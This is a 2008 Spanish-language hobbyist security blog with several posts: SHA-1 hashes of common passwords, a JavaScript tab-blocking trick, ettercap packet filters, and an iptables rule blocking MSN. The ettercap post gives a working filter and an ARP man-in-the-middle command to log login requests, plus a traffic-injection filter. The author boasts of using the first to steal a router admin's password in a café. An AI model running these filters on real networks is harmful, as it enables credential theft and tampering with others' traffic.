jueves, julio 24, 2008
e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4
Titulo extraño... no!?

Bueno, en realidad no tanto...
Hoy se me ocurrio una idea. Estaba leyendo un par de datos tecnicos sobre SHA-1 y SHA-2, cuando de repente se me prendio la lamparita.

El titulo de este post es "secret", y está hasheado con SHA-1.
Alguna vez intentaron buscar hashes de palabras conocidas en Google?! por ejemplo este hash "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"?, perteneciente a "password"!? Y este otro? 363eb224f6ff8d3c5163a8805222acbf939a65b3, perteneciente a la palabra "su".
Y este? d033e22ae348aeb5660fc2140aec35850c4da997, perteneciente a "admin"?... Y la combinacion de ambos? "d033e22ae348aeb5660fc2140aec35850c4da997 password"

Ven a lo que me refiero? Deberian estar esos Excels, y .txt, y esos etc/passwords? No, obvio que no...

Además, que es esta pagina? http://www.whogivesmore.com/en/!?

Dentro de poco presento mi nuevo proyecto, producto de esta idea...



Séxitos!

Etiquetas: , , , ,

 
posted by [DevNull] at 1:05 p. m. | Permalink | 0 comments
martes, julio 22, 2008
Como lograr que paginas no abran en otras pestañas!!??
Como lograr que paginas no abran en otras pestañas!!??

Bueno, a motivo de resolucion de la anterior pregunta, les presento una pequeña prueba de concepto
que intenta solucionar este tema.

Muchas veces, no nos interesa, o nos juega en contra que el usuario navegue por nuestra pagina
en muchas solapas a la vez. Esto suele ocurrir en paginas donde la seguridad, o la concurrencia juegan un papel
critico, o solo por histeria del diseñador/programador. Se me ocurrio lo siguente...

Archivo: no-pestaña.html

---BEGIN---
<html>

<head>

<a href="javascript:ejecutar(this);">Prueba</a>

<html>

<head>







<script>

function ejecutar()

{

window.location="http://www.google.com.ar";

}

</script>

</html>
--- END ---

La palabra "javascript:" es escencial para que esto funcione.
Lo que hace esto es, abrir la URL a travez de un script definido en nuestra pagina, y el truco
está en que cuando abra la nueva pestaña o ventana, no va a encontrar la URL y pasa nada!

Ahora suponiendo un escenario más complicado, en el que tenemos parametros en un formulario a enviar con POST,
podriamos hacer.


Archivo: no-pestaña.html


---BEGIN---
<html>

<head>

<a href="javascript:ejecutar(this);">Prueba</a>

<form name="valores" action="http://www.google.com/search" >

<input value="" title="Valor" name="q" maxlength="2048"/>

</form>

<html>

<head>



<script>

function ejecutar()

{

document.valores.submit();

}

</script>



</html>
--- END ---


De la misma manera, nos aprovechamos del truquito del script definido en la pantalla que estamos usando, y solo se ejecutará
en la ventana principal, y no en ventanas nuevas, ni pestañas...

Obviamente, esto no es una medida de seguridad bajo ningun tipo d econcepto, es solo una limitante mas para usuarios desprevenidos
o solo proligidad. Espero les sirva.


Séxitos!

Etiquetas: ,

 
posted by [DevNull] at 12:03 p. m. | Permalink | 0 comments
jueves, julio 10, 2008
Filtering and Packet tampering con ettercap!
Ettercap es EL sniffer por excelencia. Y entre una de sus cualidades, tenemos lo que es un "filter".
Que es un "filter"? Un filter es un "script" que se ejecuta por cada paquete que pasa por nuestro amigo ettercap,pudiendo uno modificar ese paquete o simplemente analizarlo, antes de que ettercap lo reenvie....
Por lo que estuve viendo, las instrucciones son bastante limitadas, y mas si uno intenta volar a nivel de programador, pero, lo minimo indispensable lo tiene.

Por ejemplo: Filtro que dumpea todo lo que diga "login.php?usr=" en el paquete, con destino al puerto 80.

archivo: filtro.src

if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "login.php?usr="))
{
log(DECODED.data, "/tmp/interesantes.log");
msg("Escribiendo paquete posiblemente interesante a /tmp/interesantes.log\n");
}
}

Receta:
1-Guardarlo como filtro.src luego compilar con: etterfilter filtro.src -o filtro.if
2-Usarlo con ettercap, por ejemplo como: ettercap // // -T -M arp -F filtro.if -i wlan0
NOTA : el conjunto de datos encapsulados en DECODED, contiene los datos decodificados del paquete, en cambio DATA contiene los datos directamente desde el cable,lo que por ejemplo en un canal encriptado con ataque de MITM solo daria garbage-data.

El anterior ejemplo, sencillo por demás, busca en el paquete actual el string "login.php?usr=" y si lo encuentra, escribe el paquete completo en el archivo /tmp/interesantes.log. Pequeño y sencillo hack, que me permitio en un cafe de Stefano, saber la contraseña del admin del router wireless....pero esa es otroa historia xD!

Los filtros, como dije antes son batastante limitados, no permiten loops, no tienen forma facil de imprimir concatenacion de caracteres, y tampoco paso de varibles de tipo input, pero se pueden lograr cosas grosas, como por ejemplo....


############################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter Ran.\n");
}


nota: compilar, y levantar con ettercap igual que el anterior...


En fin, muy groso.


mas lecturas y cosas MAS grosas:
http://www.irongeek.com/i.php?page=security/ettercapfilter
man page de etterfilter:http://www.irongeek.com/i.php?page=backtrack-3-man/etterfilter#3
Joyita adicional:
SSH downgrade attack: http://openmaniak.com/ettercap_filter.php

Séxitos

Etiquetas:

 
posted by [DevNull] at 10:31 a. m. | Permalink | 0 comments
Bloquear MSN messenger con IPtables : Una sola regla
Bloquear MSN messenger con IPtables : Una sola regla!
Se me ocurrio esta regla de IPtables para bloquear el MSN. Habria que ver si se puede aplicar a los demas mensajeros. La magia radica en que usa una sola regla!!!!

IPTABLES -t nat -A PREROUTING -p TCP --dport 1863 -j DNAT --to-destination 64.233.167.99:80

Es una hermosura... no!!!?? Le da al cliente de MSN lo suficiente como para que diga: "Supongo que el server está borracho ahora... Intente luego!"

Yo elegí a Google como pobre decoy... :D

[DevNull]

Etiquetas:

 
posted by [DevNull] at 10:09 a. m. | Permalink | 5 comments